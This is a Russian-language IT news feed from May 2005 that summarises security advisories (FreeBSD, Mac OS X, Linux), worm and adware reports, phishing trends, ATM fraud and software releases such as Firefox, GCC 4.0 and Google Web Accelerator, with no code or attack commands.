Расследование дела о хищении кода у Cisco продолжается. Сейчас в качестве главного подозреваемого проходит 16-летний хакер из Швеции, обвиненный в марте во взломе компьютерной сети Университета Уппсалы (Uppsala University). Следователи, которые ведут дела Cisco, говорят, что след ведет именно в Уппсалу, впрочем, по данным ФБР, у подростка явно были сообщники. Напомним, что кусок кода размером в 800 Мб был похищен у компании Cisco в мае прошлого года и опубликован на российском сайте SecurityLab.ru 15 мая. Как утверждали представители SecurityLab, речь идет об исходных кодах операционной системы CISCO IOS 12.3, 12.3t, которая используется в большинстве сетевых устройств компании CISCO, в частности, в роутерах (маршрутизаторах), которые отвечают за перенаправление потоков данных между разрозненными сетями, входящими в состав Интернета. ФБР и специалисты по компьютерной безопасности признали, что взлом Cisco в прошлом году был лишь частью крупной хакерской акции, в которую были вовлечены как одиночные программисты, так и небольшие группы. Всего было взломано более тысячи компьютеров, в том числе машины американской армии, NASA, крупнейших исследовательских лабораторий. Во всех случаях "почерк" преступников был одинаков. При взломах злоумышленники использовали дыры в системе безопасности. Как говорят официальные лица, позднее "дыры" были заделаны, однако даже спустя год после начала расследования не понятно, как много информации исчезло или было стерто хакерами. Как сообщает The New York Times, дело показывает, что даже крупные корпорации и правительственные учреждения не убережены от взлома компьютерных сетей. При этом отследить факт похищения информации бывает необычайно сложно.
Подробнее

8/05/2005 13:48 Уязвимости в ОС FreeBSD
В выпущенных 6 мая бюллетенях по безопасности сообщаетя о наличии 3-х уязвимостей в ОС FreeBSD. Все уязвимости носят локальный характер. Бюллетень FreeBSD-SA-05:06.iir описывает уязвимость в драйвере iir (предназначен для поддержки RAID-контроллеров от Intel и Vortex). Некорректные полномочия на файл устройства /dev/iir позволяют локальному непривилегированному пользователю получить доступ к устройству и выполнить вызов ioctl, что может привести к разрушению данных на устройстве и доступу к важной системной информации. Бюллетень FreeBSD-SA-05:07.ldt описывает уязвимость в системном вызове i386_get_ldt(2) (позволяет процессам часть таблицы локальных дескрипторов (LDT - Local Descriptor Table) cкопировать из пространства памяти ядра в пользовательскую часть). Из-за некорректной реализации проверки на безопасность вводимых данных, у пользователя может возникнуть возможность получить доступ к важной системной информации ядра (например, получить буфер терминала - пароли пользователей). Бюллетень FreeBSD-SA-05:08.kmem описывает уязвимость, позволяющую получить доступ к области памяти ядра. Во многих частях ядра FreeBSD, работа с именами (mount points, устройств, файлов и т.д.) производится с помощью строки символов, которые передаются приложениям в буферах с ограниченной ёмкостью. В некоторых местах строки динамической длины скопированы в буферы ограниченной длины без предварительной очистки неиспользованной части буфера. В неиспользованной части буфера может сохраниться привилегированная информация, которая теперь доступна приложению, работающему с буфером. Выпущены обновления для обоих веток ОС (4 и 5).
FreeBSD-SA-05:06.iir
FreeBSD-SA-05:07.ldt
FreeBSD-SA-05:08.kmem

8/05/2005 13:15 Wireless Location Appliance от Cisco позволяет следить за людьми
Компания Cisco попала под жесткую критику со стороны общественности из-за выпуска нового беспроводного RFID-сервера, который способен отслеживать людей и оборудование, находящихся в зоне действия Wi-Fi сетей. Первоначально Wireless Location Appliance 2700 был разработан для обработки сигналов от радиометок и отображать их местоположение на центральной карте и при достижении этой радиометки какой-нибудь "запрещенной" зоны сервер "поднимал тревогу". Скандал разгорелся, когда выяснился побочный эффект. Дело в том, что данный сервер хоть и разработан для отслеживания перемещения оборудования, но вполне успешно может применяться работодателями для отслеживания нахождения персонала. Правозащитники и адвокаты сходятся во мнении, что разработка компании незаконна, так как нарушает целый ряд законодательных прав человека. "Использование прибора для контроля аппаратуры - это одно, а вот применений сервера для подобного контроля за людьми недопустимо", - говорится в заявлении Liberty group. Первоначально сервер был разработан компанией AirSpace, которая была куплена Cisco. Стоимость одной активной радиометки составляет 5 долларов, а стоимость сервера около 15 000 долларов США.
Источник

8/05/2005 12:33 Китайские хакеры вырываются в лидеры
Китай все больше превращается в страну высоких технологий. И китайская молодежь все больше втягивается в мир Интернета. В настоящий момент именно китайские киберпреступники удерживают за собой пальму первенства в распространении вирусов и спама, причем специалисты отмечают, что делают они это все профессиональнее. По последним данным, оглашенным компанией Ciphertrust, занимающейся компьютерной безопасностью, 20% всех вирусных атак и массовых рассылок спама производится именно с компьютеров, за которыми сидят китайские пользователи. При этом власти Китая пока что игнорируют данную проблему и ослабили контроль за Интернетом, хотя до сих пор там сохраняется официальный государственный контроль за пунктами доступа в Сеть и существуют ограничения на доступ к ряду сервисов и ресурсов. Однако все это не останавливает китайских компьютерных умельцев. Если вспомнить, что в настоящий момент компьютер в Китае по-прежнему в большей степени признак роскоши, чем рядовое явление, и что активными пользователями Интернета являются около 8% населения страны, то можно себе представить, что ждет нас в ближайшем будущем. Нет сомнений, что число китайских хакеров и спамеров продолжит расти. Причем надо отметить, что их отличает высокое место в мировом рейтинге. Ныне уже самораспустившийся "Союз хакеров Китая", одно из крупнейших подобных объединений в стране, занимал 5 место в подобном рейтинге и была одной из самых уважаемых в мире хакерских групп.
Ytro

8/05/2005 11:27 Институт SANS выявил хакерские приоритеты
Продукты компании Microsoft - самый популярный объект атаки со стороны хакеров, однако разработки Apple, операционные системы и приложения Unix и Linux также подвергаются нападениям. Об этом в своем докладе сообщают специалисты института SANS. Хакеры по-прежнему создают новые способы проникновения в компьютерные системы и на шаг опережают разработчиков программного обеспечения, говорится в материале SANS, выдержки из которого приводит сайт Newsfactor.com. В первом квартале 2005 года специалисты SANS выявили около 600 уязвимостей в разных популярных программах. Это на 20 процентов больше числа уязвимостей, выявленных в первом квартале 2004 года. "Это многомиллиардная индустрия с хорошо финансируемыми хакерами, которые всюду ищут уязвимости и используют их, чтобы похищать информацию", - комментирует исследование глава SANS Алан Паллер (Alan Paller). По словам Паллера, самым значительным изменением последних месяцев стало то, что хакеры теперь атакуют не только операционные системы, но и программы на их платформе. По мере того, как Microsoft и другие ведущие производители ликвидируют бреши в своих операционных системах, хакеры выбирают новые объекты атаки. Теперь ими становятся антивирусные программы Symantec, F-Secure, TrendMicro и McAfee, серверы Oracle, медиаплееры iTunes, RealPlayer и WinAmp. Список 20 самых популярных объектов хакерских атак возглавляют Internet Explorer, Windows Media Player и Windows Messenger. Второй десяток списка состоит из разных брешей в Unix.
Viruslist

8/05/2005 10:43 AOL Instant Messenger претерпит значительные изменения
America Online начала тестирование новой коммуникационной программы Triton, которая ляжет в основу обновлённого интернет-пейджера AOL Instant Messenger (AIM). В отличие от Рунета, где ICQ была и остаётся безусловным лидером, в англоязычном интернете AIM является одним из самых распространенных интернет-пейджеров. Количество его пользователей составляет порядка 20 миллионов. Triton, помимо системы мгновенной передачи сообщений, скрывает в себе фотоальбом, онлайновые игры и файлообменную систему. Кроме того, к числу нововведений относится единый чат-бокс с отдельными вкладками для каждого нового диалога и быстрый доступ к адресной книге. В конечном итоге AOL обещает поддержку и видеочатов. Как пишет News.com, America Online пытается остаться впереди планеты всей, но конкуренция на рынке "социальных сетей" продолжает быстро расти. Наступают Yahoo со своей системой Yahoo 360, Microsoft (с MSN Spaces) - и далеко не только они одни. В этих условиях AOL делает ставку на широкополосные подключения, и старается расширить функционал своих коммуникационных программ, добавив в них возможность голосового общения, видеочаты и т.д. Пока неизвестно, когда именно Triton будет представлен официально; на данный момент AOL планирует выпустить ещё одну версию прежнего варианта своего AIM под индексом 5.9.
"Компьюлента"

8/05/2005 10:18 Румынские мошенники не поленились сконструировать целый банкомат
Румынские преступники подошли к вопросу хищения информации о банковских вкладах с редкой тщательностью. Они полностью собрали фальшивый банкомат для выдачи денег. Как передает CNN, в конструкции не имелось только емкости для купюр, а все остальное, в том числе устройства для считывания кодов с карточки было в наличии. Как правило, в подобных случаях, преступники изготавливают фальшивую переднюю панель банкомата, а не все устройство, сообщила местная полиция. Фальшивый банкомат несколько раз устанавливали в разных кварталах Бухареста. Сколько именно удалось наворовать грабителям, румынская полиция пока не сообщает. Представитель крупнейшего румынского банка Banca Comerciala Romana Корнель Кожокару заявил, что лучше всего использовать банкоматы, которые расположены рядом с отделениями банка. "Банки не устанавливают банкоматы посреди жилых кварталов", - сказал он.
Lenta.Ru

7/05/2005 15:31 Новая версия рекламной программы подстрекает пользователей купить ПО для своего лечения
Panda Software сообщает о появлении новой версии рекламной программы Adware/Topspyware. Она заставляет пользователя посетить сайт компании-производителя решений безопасности, где, заплатив определенную сумму, он может получить утилиты для удаления этой вредоносной программы. Данная рекламная программа не может распространяться самостоятельно, она является одной из нескольких программ, устанавливаемых на компьютер, когда пользователи посещают веб-страницы, зараженные другими типами вредоносных программ, такими как Cool Web Search (CWS), Adware/CWS.YEXE или Adware/CWS.Searchmeup. Пользователям легко может понять, что система заражена, так как вредоносный код обладает явными симптомами. С одной стороны, он отображает иконку в системном лотке, которая постоянно меняется со знака вопроса на иконку обновления Windows. Также одновременно с этой иконкой отображается ложное сообщение о найденном вирусе. Более того, вредоносный код меняет цвет рабочего стола Windows на ярко-красный и выводит предупреждение, что компьютер заражен. Для выполнения этих действий вредоносная программа изменяет ключ реестра, относящийся к иконке системного лотка и создает ключ для изменения рабочего стола, а также активации Active Desktop. И иконка, и рабочий стол являются ссылками, которые ведут пользователя на веб-страницу, предлагающую несколько программ для лечения этого кода за деньги. “Если эти программы - действительно коммерческое ПО, это значит, что пользователей мошенническим образом заманивают на этот сайт, принуждают к поискам антидота для заражения, в то время как просто обновить их антивирус было бы достаточно для решения этой проблемы, причем бесплатно”, - объясняет Луис Корронс, директор PandaLabs.
Panda Software

7/05/2005 15:12 Symantec и McAfee не совместимы с новой Windows
Пользователи 64-битной версии Windows XP не могут защитить свои компьютеры антивирусными программами Norton и McAfee, сообщает сайт Vnunet.com. Те, кто пытается установить программный пакет Norton Internet Security 2005 на компьютер под управлением Windows XP Professional x64 Edition, получают сообщение об ошибке и получают ссылку на специальную веб-страницу компании Symantec. Текст, размещенный на странице, гласит: "Symantec в настоящее время не продает никаких сертифицированных продуктов, совместимых с 64-битными процессорами и операционными системами. Похожая ошибка возникает, когда пользователи пытаются установить антивирусные пакеты McAfee. Ранее представители Symantec заявляли, что их продукты будут совместимы с 64-битными версиями Windows, однако дату релиза таких продуктов не называли. На сайте McAfee новая версия Windows вообще не упоминается. 64-битные версии Windows XP Professional и Server 2003 поступили в продажу 2 мая. Собственный антивирусный сервис Microsoft будет запущен в течение нескольких месяцев. По мнению аналитиков, на создание антивирусных продуктов, совместимых с 64-битными продуктами Microsoft, Symantec и McAfee может понадобиться от 30 до 180 дней.
Vnunet

7/05/2005 14:10 Множественные уязвимости в программном обеспечении в Mac OS X
Обнаруженные уязвимости позволяют вызвать отказ в обслуживании, выполнить произвольный код на целевой системе, получить доступ к потенциально важной информации.
1. Переполнение буфера в Apache в утилите htdigest, контролирующей доступ пользователей к web серверу. Удаленный пользователь может выполнить произвольный код на целевой системе.
2. Целочисленное переполнение в AppKit при обработке изображений в формате TIFF. Удаленный пользователь может создать специальным образом TIFF файл и выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего приложение.
3. Уязвимость существует в функции NXSeek() в AppKit из-за того, что приложение не обрабатывает исключение. Удаленный пользователь может с помощью специально сформированного TIFF изображения вызвать переполнение буфера и аварийно завершить работу приложения.
4. Уязвимость в AppleScript позволяет злоумышленнику не отображать часть скачиваемого кода. Локальный пользователь может скомпилировать специально сформированный код и подвергнуть свою систему опасности.
5. Обход ограничений в Bluetooth позволяет злоумышленнику начать обмен данными без уведомления пользователя. Злоумышленник может получить несанкционированный доступ к целевой системе.
6. Обход каталога возможен при использовании Bluetooth. Злоумышленник может выйти за пределы корневой директории и получить доступ к потенциально важным данным на системе.
7. Обнаружен обход ограничений безопасности в Directory Services. Локальный пользователь может манипулировать утилитами chfn/chpass/chsh для предоставления привилегированного доступа непривилегированному пользователю.
8. Небезопасная обработка файлов .DS_Store в Finder позволяет локальному пользователю перезаписать файлы и потенциально повысить свои привилегии на системе.
9. Переполнение буфера обнаружено в Foundation при обработке переменных окружения. Злоумышленник может с помощью специально сформированной переменной окружения вызвать переполнение буфера и выполнить произвольный код на целевой системе.
Подробности и остальные уязвимости

7/05/2005 14:01 Фишеры постоянно совершенствуются
Мошенники, использующие методы личных данных под общим названием «фишинг» не стоят на месте. Они постоянно совершенствуются в искусстве в «отъеме данных у населения». Согласно последним данным компании Websense, полученным совместно с Anti-Phishing Working Group, сейчас у фишеров особенно популярны кейлоггеры — программы, записывающие в файл все нажатия пользователя на клавиатуре. Анализируя этот лог, преступник может легко обнаружить пароли, которые человек использовал в течение работы кейлоггера. Буквально недавно у фишеров в ходу были подложные сообщения электронной почты, в которых интернетчику предлагалось зайти на некий сайт, полностью имитирующий дизайн какого-либо известного банка или онлайнового финансового сервиса, и ввести в предложенных полях свой пароль к аккаунты якобы для подтверждения. Естественно, введенный пароль оказывался в руках злоумышленника, который использовал его для опустошения счета своей жертвы или иных махинаций. Также иногда на подложных сайтах оказывается вредоносный код, заражающий компьютер и ворующий данные непосредственно с жесткого диска. В течение февраля и марта Websense обнаруживала 10 новых вариантов кейлоггеров и 100 новых подложных сайтов. В Ноябре и декабре 2004 года статистика была куда более спокойная: 2 кейлоггера и 15 фейк-сайтов. Среди уловок фишеров были также такие, как использование поддельных новостных лент, зараженных троянами и создание фейковых сайтов по адресам, схожих по написанию с доменами известных сетевых брэндов — например, Amazon.com или Google.Com. Как сообщает Websense, кейлоггеры устанавливаются без каких-либо действий со стороны пользователя, тому только достаточно открыть зараженное письмо, и программа-шпион инсталлируется на компьютер автоматически. Далее она, никак не напоминая о себе, будет следить за каждым нажатием клавиш пользователям и периодически отсылать клавиатурный лог своему создателю.
Источник

7/05/2005 12:52 В 2007 году Китай обгонит США
В течение ближайших двух лет число пользователей высокоскоростного интернета с китайским гражданством превысит абонентскую базу американских провайдеров. Уже к концу этого года общее число пользователей быстрого доступа должно достичь 34 миллионов человек. В США на 31 декабря 2005 года число подписчиков кабельных и xDSL-операторов составит примерно 39 миллионов человек. Тем не менее, уже к концу 2007 года в КНР и США будут жить соответственно 57 и 54 миллиона пользователей. Таким образом, Китай года через два станет крупнейшим рынком оборудования для высокоскоростного подключения. По крайней мере, так считает компания iSupply, на отчет которой ссылается CNET. На сегодняшний день, по данным компании IMS Research, общее количество пользователей широкополосного доступа составляет более 150 миллионов человек по всему миру. Из них более 51 миллиона подключилось в течение последних полутора лет. Ожидается, что к 2009 году абонентская база высокоскоростных провайдеров достигнет четырехсот миллионов человек.
Источник

7/05/2005 12:41 GCC 4.0 нуждается в существенной доработке
Как заметил ведущий разработчик Марк Митчелл в интервью: "Он (GCC 4.0) получил полностью новую инфраструктуру оптимизации. Но вся она еще не была достаточно хорошо настроена так, как в предыдущем релизе". Одной из первых проблем GCC 4.0 стала невозможность сборки популярнейшей графической среды для UNIX/Linux-систем KDE. В результате проект KDE временно занес GCC 4.0 в "черный список". На данный момент ошибка с компиляцией KDE решена, и патч появится в ближайшее время: "Возможно, мы выпустим релиз 4.0.1 раньше, чем планировалось". Причем ожидалось, что 4.0.1 появится через два месяца, а выйти он может на месяц раньше. О другой проблеме GCC 4.0 на этой неделе сообщил Скотт Лэдд. Сравнив GCC 4.0 с его предшественником (3.4.3), программист обнаружил, что новая версия зачастую не просто работает медленнее, но и собранные с ней приложения по скорости также уступают сборкам с GCC 3.4.3. Реакция Митчелла на это оказалась достаточно нейтральной: "Полностью переписать оптимизатор и не ухудшить положение вещей в значительной степени - это настоящее достижение".
Подробности

7/05/2005 12:08 Firefox 1.1 будет отображать страницы почти мгновенно
Начиная с версии 1.1 браузер Firefox будет быстрее отображать страницы при преходах с использованием кнопок «Back» и «Forward». Об этом в блоге написал Chase Phillips, один из разработчиков браузера. В существующие тестовые Nightly Builds эта функция уже интегрирована, но по умолчанию отключена. О механизме функционирования подробно написано здесь. Увеличение скорости будет достигнуто за счет того, что при обращении к функции «Back» или «Forward» обновится не страница целиком. Для отображения страницы Gecko-Engine хотя и кэширует ее, но должен каждый раз выполнять заново (производить ре-рендеринг). А это занимает некоторое время. С новой функцией показанные страницы будут сохраняться на диск, поэтому доступ к ним станет почти мгновенным. Упомянутые Nightly Build для Windows, Linux и MacOS являются пока тестовыми версиями. Финальный Firefox 1.0.4 появится скоро (хотя некоторые сетевые ресурсы уже поспешили дать линки на скачивание Firefox 1.0.4 Nightly Build), а Firefox 1.1 должен появиться летом.
Источник

7/05/2005 11:31 Взломан формат оптических носителей Sony UMD
Как сообщает Reuters со ссылкой на веб-сайт PS2nfo.com, неким умельцам удалось частично взломать формат оптических носителей Sony UMD. Носители UMD (Universal Media Disc) применяются в карманной игровой приставке Sony Playstation Portable (PSP), которая поступила в продажу на территории Японии в декабре прошлого года. Диски имеют диаметр шесть сантиметров, считывание информации производиться лазером с длиной волны в 660 нм на скорости до 11 Мбит/с. Емкость двуслойного носителя составляет 1,8 Гб, при этом записываемые данные Sony защищает по технологии Secure ROM от компании AES. Впрочем, несмотря на защиту, хакеры все же научились просматривать содержимое дисков, хотя запускать хранящиеся на них игры на компьютере пока не представляется возможным. Тем не менее, в интернете уже выложены списки файлов, записанных на носители UMD с такими играми, как Ridge Racers, Wipeout Pure и Vampire Chronicles. По всей видимости, теперь умельцы постараются преодолеть оставшиеся ограничения и все же обеспечить возможность загрузки программ для PSP на РС. На сегодняшний день корпорация Sony распродала свыше полутора миллионов карманных приставок Playstation Portable. Помимо Японии, устройство в настоящее время доступно в Соединенных Штатах, где его цена составляет 249 долларов. А на 1 сентября намечена европейская премьера PSP. Ожидается, что в странах Европы новинку можно будет приобрести за 249 евро.
Источник

7/05/2005 10:14 GIMP стал "человечнее"
Ребята из Plastic Bugs анонсировали доступность продукта GIMPshop - переработанного ПО GIMP, фактически предоставляющего почти те же возможности, что и знаменитый Photoshop (хотя специалисты и вряд ли с этим полностью согласятся), однако, в отличие от продукта Adobe являющегося бесплатным ПО с открытым исходным кодом. Ранее у специалистов, предпочёвших этот продукт Photoshop вызывал трудности сам интерфейс работы с программой. И вот, в своём Plastic Bugs предлагают потрясающее бесплатное решение. Они перекроили Gimp, придав ему облик Photoshop, добавив такие же функции и называли его GimpShop. На настоящий момент предлагаются версии для OS X 10.3, RPM для Linux, пакет для Debian и Solaris, а также нефоициальная версия для Windows XP. Ну и, разумеется, можно скачать исходный код продукта (около 14 мБ).
Анонс

6/05/2005 18:12 Самые популярные дистрибутивы Linux в 2004 году
Сайт DesktopLinux.com обнародовал результаты ежегодного опроса своих посетителей (данный ресурс посвящен различным аспектам применения ОС Linux на персональных ПК). Всего было опрошено более 3800 человек. В 2004 году самым популярным дистрибутивом стал Yoper, который получил 18% пользовательских симпатий. Интересно, что в 2003 году за него проголосовали лишь 0,1%. Сильно упали по сравнению с 2003 годом позиции Debian (33% и 12%, соответственно). Пользователи также несколько разлюбили Mandrakelinux (18% и 14%). Относительно стабильными остаются SuSE (14%), RedHat (14%) и Slackware (6%). Что касается пользовательских предпочтений в области графических оболочек для Linux, то здесь уверенно лидирует KDE, положение которой значительно укрепилось по сравнению с прошлым годом (42% и 61%, соответственно), а за Gnome проголосовали 21% респондентов (в 2003 году - 26%). Самыми популярными почтовыми клиентами для Linux в 2004 году признаны Evolution (27%), Kmail (26%) и Thunderbird (25%). Взлет популярности последнего вообще можно назвать сенсационным, так как в 2003 году, когда этот проект был только запущен, за него не проголосовал никто. Предпочтения пользователей Linux в области веб-браузеров распределились следующим образом. Почти 40% получил Firefox, несколько упала по сравнению с 2003 годом популярность Mozilla (45% и 30%, соответственно), а третьим по популярности и тогда и сейчас остается Konqueror (16%). Наконец, совершенно стабильными остаются позиции программ, предназначенных для запуска Windows-приложений в среде Linux. На первом месте остается Wine (34%), на втором коммерческий пакет на его основе Crossover Office (16 %), а на третьем эмулятор VMWare (14%). Интересно, что 28% опрошенных отметили, что они вообще не запускают в Windows Linux-приложения (в 2003 году это число было больше - 42%).
Результаты опроса

6/05/2005 12:36 Google придумала "ускоритель Интернета"
Компания-лидер в сфере услуг интернет-поиска Google объявила о выходе своего нового продукта Google Web Accelerator ("сетевой ускоритель"), который, как утверждается, предназначен для того, чтобы "интернет-страницы быстрее загружались", для чего компания использует "мощности глобальной компьютерной сети Google", сообщает Lenta.Ru. Ускоритель имеет вид клиентской программы, которая устанавливается на пользовательский компьютер и производит оптимизацию работы с интернет-трафиком, используя различные алгоритмы для предварительной загрузки страниц и локального копирования (кэширования), которые учитывают индивидуальные особенности пользователя, а также координируя по Интернету свои действия с серверами Google, которые также оптимизируют трафик и кэшируют данные на основании данных, поступающих от клиентских программ и собранной статистики. Как отмечается на сайте компании, пользоваться системой (она бесплатна) имеет смысл только пользователям, подключенным к Интернету посредством широкополосных соединений - на коммутируемых телефонных (dial-up) линиях разница в скорости загрузки страниц при использовании ускорителя заметна не будет. Кроме того, компания подчеркивает, что продукт находится в стадии бета-тестирования, и сейчас заявленное "улучшение работы Интернета" может быть явно заметно только пользователям, находящимся в Северной Америке и Европе - в других регионах установка программы может не дать эффекта. Следует отметить, что в Интернете давно существует множество сайтов, предлагающих "ускорители Интернета" - часто под такими названиями скрываются мошеннические "шпионские программы", которые якобы производят оптимизацию работы с трафиком, а на самом деле являются "троянами", показывают рекламу, могут похищать пользовательские данные, а деятельность по "оптимизации", если и присутствует, то сводится к единовременному изменению какого-либо параметра настройки ОС Windows, которое необязательно может положительно повлиять на ее работу. Google Web Accelerator к таким программам не относится. Он встраивается в браузер (поддерживаются Microsoft Internet Explorer и Mozilla Firefox) и его при желании можно отключить или настроить специальный режим его работы для конкретных сайтов. Значок программы помещается на одну из панелей браузера и там программа показывает "сколько времени сэкономил пользователь" при загрузке той или иной страницы.
Описание

5/05/2005 17:24 За два года из украинских банкоматов похитили 5 млн. дол США
Украинская межбанковская ассоциация член платежных систем (ЕМА) заявила, что в период с 2003 по 2005 г. через банкоматы в Украине по поддельным карточкам было незаконно получено более чем 5 млн. дол. США. Ассоциация ЭМА создана в апреле в 1999 году и объединяет около 30 банков, по информации ЭМА в настоящее время рабочая группа Министерства внутренних дел Украины завершает подготовку внедрения программы противодействия преступлениям с банковскими платежными карточками. По мнению Ассоциации, риск процедуры и политика мониторинга рисков украинских банков-эмитентов отвечает требованиям платежных систем. Совсем недавно правоохранительные органы Украины пресекли деятельность двух преступных групп занимавшихся мошенничеством с пластиковыми картами. В марте в Киеве был задержан житель Одесской области по подозрению в хищении с использованием поддельных карточек 1.2 млн. Грн. из банкоматов разных банков в г. Киеве и г. Донецке. Через некоторое время милиция также задержала группу подозреваемых в хищении 160 тыс. Грн., из банкоматов в г. Киеве.
Crime-Researxh

5/05/2005 16:22 Microsoft поддержала WPA2
Спустя почти год после ратификации стандарта шифрования данных IEEE 802.11i (WPA2) его поддержка появилась в Windows. Вышедшее недавно обновление Windows XP обеспечивает сертификацию ОС на соответствие WPA2 - спецификации безопасности для сетей Wi-Fi, созданной на смену устаревшим и несовершенным Wired Equivalent Privacy (WEP) и Wi-Fi Protected Access (WPA). Новый стандарт предусматривает использование шифрования AES, аутентификации 802.1X, а также защитных спецификаций RSN и CCMP. Как предполагается, WPA2 должен существенно повысить защищенность сетей Wi-Fi по сравнению с прежними технологиями. По словам представителей Microsoft, обновление, выпущенное для Windows XP, XP Media Center Edition, Tablet PC Edition и Service Pack 2, обеспечит возможность использования WPA2 в ОС без какого-либо вспомогательного ПО. Дополнительно в обновлении реализована поддержка механизма обнаружения защищенных сетей хотспотов для регистрации в них - Wireless Provisioning Services Information Element.
"Открытые системы"

5/05/2005 15:30 Juniper и Avaya объединились против Cisco
Компании Juniper Networks и Avaya собираются объединить усилия в разработках с целью победить в конкурентной борьбе компанию Cisco Systems. Компания Avaya является одним из лидеров рынка телекоммуникации и IP-телефонии, в то время как Juniper соревнуется с Cisco на рынке высококачественных роутеров и файрволов. Соглашение, которое уже анонсировано, но ещё не подписано, расширит существующие отношения, подразумевающие проведение работ в области интеграции продуктов компаний по специальным контрактам. Объединив усилия, компании рассчитывают получить возможность предоставить более привлекательные совместные коммуникационные решения и сервисы. Компании также планируют объединить коммуникационные приложения и клиентские устройства от Avaya с инструментами маршрутизации и безопасности компании Juniper. Если сотрудничество окажется успешным, то усилившаяся конкуренция на рынке телекоммуникационного оборудования может улучшить положение операторов мобильной связи и беспроводных сетей за счёт увеличения выбора и снижения стоимости оборудования. Это один из тех случаев, когда конечные пользователи тоже могут оказаться в выигрыше.
Mobile-Review

5/05/2005 15:16 Хакеры выбирают iTunes
Судя по данным, опубликованным в очередном отчете SANS Institute, сетевые взломщики все чаще обращают свое внимание не только на многострадальную Windows, но и на другие, менее привычные объекты: антивирусное ПО и даже медиа-плееры Apple iTunes. Хакеры взялись за программное обеспечение "сторонних производителей" не от хорошей жизни: по мере того, как все большее количество пользователей Windows прибегает к использованию функции автоматической загрузки обновлений, взлом таких компьютеров становится все более сложной задачей. Приходится искать новые пути, сообщает нам агентство Reuters. Несмотря на то, что продукция Microsoft по-прежнему остается популярной мишенью для мошенников всех мастей, в этом году в список их жертв попали пользователи программного обеспечения, компаний Oracle и Computer Associates, а также многомиллионная армия любителей музыки. Причем, последним деваться от жуликов особо некуда: дыры обнаружены не только в WinAmp'е, но и в менее распространенных плеерах Apple iTunes и RealPlayer. Уязвимым к сетевым атакам оказалось даже программное обеспечение антивирусных компаний Symantec, F-Secure, TrendMicro и McAfee.
Подробности

5/05/2005 14:14 Эпидемия червя Sober.p зафиксирована в Западной Европе
«Лаборатория Касперского» сообщает об обнаружении новой версии почтового червя Email-Worm.Win32.Sober — Email-Worm.Win32.Sober.p. Первое появление вредоносной программы в интернете зафиксировано экспертами «Лаборатории Касперского» 2 мая. На данный момент, согласно сообщениям провайдеров интернет-услуг, этот червь является наиболее часто встречающейся вредоносной программой в почтовом трафике. Следует также отметить, что Sober.p уже побил все возможные рекорды своих «предшественников» — других почтовых червей — по количеству рассылаемых писем и скорости распространения в западноевропейском сегменте интернета (Голландия, Германия, Венгрия и другие страны), тогда как от азиатских и российских пользователей поступает минимум жалоб на заражение данной версией червя Sober. Sober.p распространяется через электронную почту в виде вложений в электронные письма. Червь представляет собой самораспаковывающийся архив размером около 53 КБ, вложенный в письмо с произвольно выбранными заголовком и текстом (зачастую на немецком языке). Наименование зараженного вложения при этом также выбирается произвольно из определенного списка и получает расширение .zip. Червь активирует себя при запуске зараженного вложения пользователем. После запуска на экране появляется сообщение архиватора об ошибке в CRC (“CRC not complete”). Работающий червь копирует себя в системный каталог под именами сервисных системных программ и создает собственные копии в нескольких папках, а также регистрирует себя в ключе системного реестра. После копирования червь осуществляет поиск адресов для проведения рассылки. Поиск производится как в адресных книгах, так и в файлах, содержащих различные виды данных – текстовые файлы, презентации Microsoft Power Point, базы данных и т.д. Когда поиск завершен, червь рассылает себя по всем найденным на зараженном компьютере адресам.
"Лаборатория Касперского"

5/05/2005 13:47 Обзор вирусной активности апреля
"Лаборатория Касперского" опубликовала традиционный ежемесячный обзор вирусной активности прошедшего месяца. Согласно этому обзору, на первом месте значится червь Mytob.c с 27,80% зафиксированных инцидентов. 3 следующих места оккупировали клоны червя Netsky. "Q" c 16,53%, "aa" с 6,05% и "b" с 5,77%. Обнаруженный 4 марта червь Mytob.c смог за два месяца оттеснить с первой строчки лидера 2004 года – NetSky.q, причем эта смена фактически произошла еще в конце марта. Буквально с первых дней своего появления Mytob.c показал, что пришел всерьез и надолго. Основанный на исходных кодах червя Mydoom.a, он также содержит в себе функцию размножения по сетям при помощи уязвимости LSASS, и, кроме того, имеет бот-функционал, что и отражено в его названии, данном антивирусными компаниями, – My(doom) + tob(bot наоборот). Двойной способ размножения делает невозможным быстрое устранение эпидемии только путем обнаружения и удаления червя в почтовом трафике на крупных почтовых узлах. Для решения "проблемы Mytob” необходимо, чтобы как можно большее число пользователей установило критические обновления для ОС Windows, закрывающие уязвимость в LSASS. Тревогу вызывает и тот факт, что Mytob.c пришел не один. Кроме него в апрельской 20-ке находятся еще 5(!) представителей данного семейства, что делает его вторым широте охвата в нашем вирусном хит-параде после Netsky (8 вариантов). Отметим, что NetSky для достижения таких показателей понадобилось несколько месяцев, тогда как Mytob добился этого за месяц.
Обзор

5/05/2005 12:44 В Австралии работодателям запретят перлюстрацию частной электронной почты своих сотрудников
В скором времени в австралийском штате Новый Южный Уэльс перлюстрирование работодателем частной электронной почты работника будет объявлено вне закона. Об этом сообщает агентство Reuters. Новый законопроект, не имеющий пока аналогов в стране, является частью антишпионского законодательства, представленного правительством штата в среду. Нелегальным предложено считать скрытое наблюдение за сотрудниками с использованием различных технологий, включая видеокамеры, специальные устройства для слежения и перлюстрирование электронной почты. В Австралии действует закон о неприкосновенности частной жизни, однако мониторинг электронной почты под него не подпадает. Ожидается, что пакет новых законов будет принят на следующей неделе. Предусматриваемое наказание за нарушение закона - штраф в размере 5500 австралийских долларов (4278 долларов США) для каждого директора компании или организации. Местные профсоюзы одобрили этот шаг властей, считая, что новое законодательство знаменует победу над "Большим Братом".
"Компьюлента"

5/05/2005 12:05 Локальные уязвимости в ядре Linux
Jean Delvare и Jani Jaakkola сообщили о существовании локальных уязвимостей в ядрах Linux 2.6.x. Первая уязвимость связана с некорректными полномочиями файла "alarms" файловой системы sysfs при работе драйверов мониторинга it87, via686a. В результате возникает теоретическая возможность вызвать исчерпание системных ресурсов при записи в этот файл. Вторая уязвимость связана с ошибкой в функции key_user_lookup() файла security/keys/key.c, что может позволить вызвать аварийное завершение работы ядра. Рекомендуется обновиться до версии 2.6.11.8.
Подробности

5/05/2005 11:53 Выход FreeBSD 5.4 откладывается
Первоначально запланированный на 4 апреля, релиз FreeBSD 5.4 перенесен еще на одну неделю, необходимую для решения недавно обнаруженных проблем со стабильностью на высоконагруженных системах. Тем временем вышел FreeBSD 5.4-RC4, релиз намечен на 9 мая.
Opennet.Ru

5/05/2005 11:21 Microsoft даст пиратам поблажку
